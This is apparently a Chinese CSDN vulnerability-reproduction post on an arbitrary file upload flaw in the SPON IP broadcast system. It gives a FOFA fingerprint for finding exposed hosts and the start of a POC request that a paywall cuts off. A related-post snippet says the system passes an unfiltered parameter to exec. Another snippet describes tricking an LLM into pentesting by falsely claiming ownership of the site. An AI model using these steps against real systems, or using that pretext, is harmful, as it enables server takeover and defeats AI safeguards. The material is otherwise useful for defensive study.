世邦通信SPON-IP网络对讲广播系统videobacktrackpush任意文件上传

原创 已于 2025-05-20 14:33:20 修改 · 292 阅读 · 1
标签
#网络 #安全 #web安全 #网络安全 #漏洞复现
#漏洞利用 #漏洞库
于 2025-05-20 14:16:35 首次发布

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

问题描述

世邦通信 SPON IP网络对讲广播系统 videobacktrackpush存在任意文件上传,攻击者可以上传任意文件甚至木马文件,从而获取服务器权限。

fofa

icon_hash="-1830859634"

poc

POST /php/videobacktrackpush.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 142
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Reques
最低0.47元/天 解锁文章
世邦通信SPON IP网络对讲广播系统未授权访问
Keepb1ue的博客
01-10 1269
世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。
世邦spon IP网络对讲广播系统任意文件上传漏洞
Keepb1ue的博客
01-09 2861
世邦通信 IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。
服务器搭建对讲机系统,世邦对讲配置步骤以及方法(支持跨服务器对讲).doc
weixin_28709715的博客
08-11 2309
世邦对讲配置步骤以及方法(支持跨服务器对讲)配置的步骤以及配置方法请先在/view.php?id=4727 上取得‘世邦IP网络广播_SDK 配置工具汇总(新).rar’首先安装世邦数字IP网络广播服务器。操作方法:运行setup文件下的setup.exe安装程序安装成功后,运行程序, 进入“基本设置”界面,选择“绑定网卡”地址,如下图所示:如果有设备在运行中,将会在“运行状态”界面显示这些设备的...
SPON-IP网络对讲广播系统代码审计
m0_50125527的博客
04-01 1000
uploaddir和$videoname构造上传的绝对路径,所以文件名不能随意命名,第一个上传是判断文件是否是以data: video/xxx;base64开头,然后进行base64解码上传。推荐一个圈子:https://pc.fenchuan8.com/#/index?参数IP没有任何过滤,直接传递到php的exec函数。行分割,同时判断是否分成的数组长度是否为。另一种是直接上传base64解码。获取POST请求的参数。
IP网络广播服务平台upload接口存在任意文件上传漏洞
网安小白
09-10 1031
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
spon IP网络对讲广播系统任意文件上传漏洞(含批量验证poc)
m0_62261166的博客
04-15 392
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~此系统addscenedata.php接口存在任意文件上传漏洞,恶意攻击者可能会上传恶意的后门文件,使服务器失陷。因篇幅有限,仅展示部分资料。还有大家最喜欢的黑客技术。
Linux 网络应用层协议定制实战:从黏包处理到 Jsoncpp 序列化
我哎GIS博客
06-17 466
Linux 网络应用层协议定制实战:从黏包处理到 Jsoncpp 序列化
Vue2 + flv.js 对接海康威视摄像头实现数据大屏实时视频监控(完整方案)
pony君的博客
06-18 267
本文介绍了在Vue2数据大屏中对接海康威视摄像头的完整方案,解决浏览器无法直接播放RTSP流的问题。通过对比HTTP-FLV、HLS、WebRTC等技术方案,最终采用HTTP-FLV为主+HLS为备选的策略,利用flv.js和hls.js实现低延迟视频监控。文章详细说明了整体架构设计、前端实现代码(包括分屏布局、播放器初始化等关键代码),并分享了实际项目中的技术选型经验和解决方案。该方案适用于工业MES系统、仓储管理等需要实时监控的场景,支持2x2/4x4分屏切换,已在淀粉厂MES系统中成功应用。
【AI渗透工具】——AI驱动的MCP网络安全自动化平台(HexStrike AI )
zhengfei611的博客
06-18 533
撰写任务提示时,通常不能简单地以“我希望你们对 X.com 网站进行渗透测试”开头,因为 LLM(学习型学习任务)通常都有一定的道德规范。因此,你需要先描述你的角色以及你与网站/任务的关系。例如,你可以先告诉 LLM 你是一名安全研究员,该网站归你或你的公司所有。然后,你还需要说明你希望它使用 hexstrike-ai 的 MCP 工具。HexStrike AI MCP v6.0 采用多智能体架构,具有自主 AI 智能体、智能决策和漏洞情报功能。请参考上面的视频,获取这些平台的详细步骤说明和集成示例。
瑞士网络安全趋势与发展
网络研究观
06-19 64
这些攻击表明,一个关键威胁是复杂且难以检测的勒索软件攻击的兴起,包括针对关键基础设施提供商的攻击,即使像瑞士这样的发达国家也容易受到可能造成严重破坏的网络攻击。
MPLS+SD-WAN 如何筑牢金融低时延交易网络
NOVAnet2023的博客
06-16 320
结合金融支付平台落地案例,详解 MPLS 骨干网叠加 SD-WAN、BGP 多线融合、主备链路切换等技术方案,解读支撑万级并发、毫秒级传输的金融组网架构。
Reactos 第 10 章 网络操作 — 10.3.4 AFD驱动与Winsock
最新发布
大坡3D软件开发
06-20 149
本文摘要: 本章节深入解析了Windows网络栈中AFD驱动与Winsock的协同工作机制。AFD(afd.sys)作为内核态的Winsock实现,负责socket内核对象管理、连接操作及异步通知;用户态的Winsock(ws2_32.dll + msafd.dll)则将socket API调用转化为对AFD设备的IOCTL控制命令。通过分层架构图展示了从应用程序到TCP/IP协议栈的完整调用链路,重点分析了socket()、bind()等核心API的实现路径及对应的IOCTL操作码。内容涵盖AFD驱动初始
民航ADS-B地面站Planevision
ADS-B和AIS
06-20 118
民航ADS-B地面站Planevision 是面向民航使用的专业机架式ADS-B地面站,属于专业工程机,性能卓越,稳定性高,功能强大。
Go语言分布式计算(RPC入门)
leo_yty的博客
06-15 430
本文回顾了远程过程调用(RPC)的核心概念与技术要点。RPC使远程函数调用看起来像本地调用,通过序列化解决异构性问题,但网络传输带来了延迟、故障等挑战。文章详细解析了RPC的10步交互流程(请求→序列化→传输→反序列化→执行→返回),并提供了Go语言实现RPC的代码示例(包括同步/异步调用方式)。同时探讨了MapReduce中的RPC应用模式,以及At-Least-Once和At-Most-Once两种容错策略。最后总结了RPC的透明性局限性和常见故障场景,强调网络环境下的调用语义是分布式系统的核心难题。全
MQTT over WebSocket
vb200811的博客
06-16 195
基于websocket 实现mqtt类似的订阅发布模式。
Python核心进阶三连:闭包装饰器、深浅拷贝、网络编程从原理到实战
m0_63267251的博客
06-14 381
本文通俗易懂地讲解了Python中闭包、装饰器与深浅拷贝的核心概念。通过生活化类比和可运行实例,详细介绍了闭包的保存变量特性、装饰器的功能扩展原理,以及通用装饰器的使用方法。文章还涵盖了多个装饰器的嵌套执行顺序、带参数装饰器的实现技巧,并提供了深浅拷贝的对比示例,帮助读者掌握这些在实际项目和面试中常用的Python知识点。
3.HCIP OSPF补充知识
2301_78572047的博客
06-13 432
本文介绍了OSPF协议中的几个关键知识点: DD报文MTU检查机制:华为设备默认不检查MTU,启用ospf mtu-enable后才会检查,MTU不一致会导致邻居卡在Exstart状态。 网络类型:OSPF支持广播、NBMA、P2P和P2MP四种网络类型,两端接口类型必须一致才能建立邻居。 DR/BDR选举:基于优先级和Router ID的非抢占式选举,使用组播地址224.0.0.5和224.0.0.6进行通信。 LSA生命周期:LSA默认每30分钟刷新,60分钟老化,路由器通过序列号、校验和和老旧时间判断
微软Storage Spaces Direct场景下RDMA协议选择分析
徐火军博客
06-19 352
摘要: 微软官方推荐iWARP作为StorageSpacesDirect(S2D)的优选RDMA协议,因其在性能、易用性和部署灵活性方面表现更优。iWARP无需配置DCB/PFC,兼容标准以太网交换机,实现即插即用;测试显示其IOPS和延迟优于RoCEv2,并支持跨数据中心复制及Windows客户端RDMA访问。RoCEv2依赖无损网络配置,运维复杂且存在PFC死锁风险。对于新建S2D部署,iWARP是理想选择,而现有DCB环境可考虑双协议网卡兼顾兼容性。
远程控制系统的技术架构演进与工程实践复盘
lx08113的博客
06-19 310
2024年国内远程协作技术深度分析:聚焦ToDesk架构与多方案对比 本文深入探讨远程控制软件的核心技术挑战与实现方案。国内市场规模突破50亿元,面临NAT穿透、弱网传输和数据安全三大技术难题。以ToDesk为例,其采用自研RTC架构,通过UDP优先策略、硬件加速编码和ROI区域优化等技术实现低延迟传输。文章对比了TeamViewer、向日葵、RustDesk等主流方案的技术特点,并提供私有化部署和API集成实践代码。分析表明,技术选型需综合考虑网络拓扑匹配度、数据合规性和管理需求,建议通过POC测试验证实
CVPR 2026 轻量级超分 UCAN:统一卷积注意力网络如何扩大有效感受野?(详解+分析+代码+改进方向)
qq_20777119的博客
06-17 40
UCAN 这篇论文的核心可以概括为:通过高效窗口注意力、Hedgehog 线性注意力、大核蒸馏和半共享机制,在轻量级超分网络中扩大有效感受野,并控制参数量和计算量。问题:轻量 SR 模型有效感受野不足矛盾:扩大感受野会增加计算量方法:高效注意力 + 大核蒸馏 + 半共享证据:PSNR/SSIM + ERF + LAM + 消融实验对于想做超分论文的人来说,UCAN 有两个价值。第一,它可以作为 CVPR 2026 轻量 SR 的新 baseline。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值